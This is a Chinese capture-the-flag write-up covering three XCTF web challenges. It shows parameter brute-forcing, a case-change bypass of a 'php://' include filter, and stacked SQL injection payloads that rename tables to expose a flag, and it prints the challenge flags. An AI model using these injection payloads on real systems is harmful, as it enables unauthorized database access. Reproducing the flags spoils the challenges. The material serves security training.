攻防世界WEB高手进阶区ics-06,Web_php_include,supersqli

本文阅读 2 分钟
首页 安全分享,WEB安全 正文

目录

ICS-06

题目介绍

题目思路

访问靶场

在报表中心找到漏洞

修改id数值页面不变

BP爆破

找到flag

Web_php_include

题目介绍

题目思路

访问靶场

大写绕过

伪代码执行绕过

找到flag

supersqli

题目介绍

题目思路

访问靶场

查看是否具有sql注入

尝试堆叠注入

修改表名

查flag

题目介绍

img

题目思路

访问靶场

img

在报表中心找到漏洞

img

修改id数值页面不变

对id进行爆破

img

BP爆破

设置变量

img

设置payload

img

攻击结果

img

找到flag

cyberpeace{e4117dc92f5608d688a61116e3a992fc}

题目介绍

img

题目思路

访问靶场

img

while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);

截取php://并替换为空

大写绕过

img

查看fl4gisisish3r3.php

img

查看源码

img

伪代码执行绕过

img

img  

找到flag

ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}

题目介绍

img

题目思路

访问靶场

img

查看是否具有sql注入

1' and 1=1 #

img

用二分法查看列数(有两列)

1' order by  2 #

img

union select报出禁止关键词

img

尝试堆叠注入

';show databases;--+

img

';show tables;--+

img

'; show columns from 1919810931114514 ;--+

img

'; show columns from words ;--+

img

修改表名

img

'; alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50); #

;  alter tables words rename to words1;

;  alter tables `1919810931114514` rename to words ;

;  alter tables words change flag id varchar(50); #

查flag

1' or 1=1 #

img 找到flag

flag{c168d583ed0d4d7196967b28cbd0b5e9}

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/m0_63127854/article/details/125197166
-- 展开阅读全文 --
BUUCTF Web [极客大挑战 2019]Knife
« 上一篇 06-24
安全面试之XSS(跨站脚本攻击)
下一篇 » 07-24

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复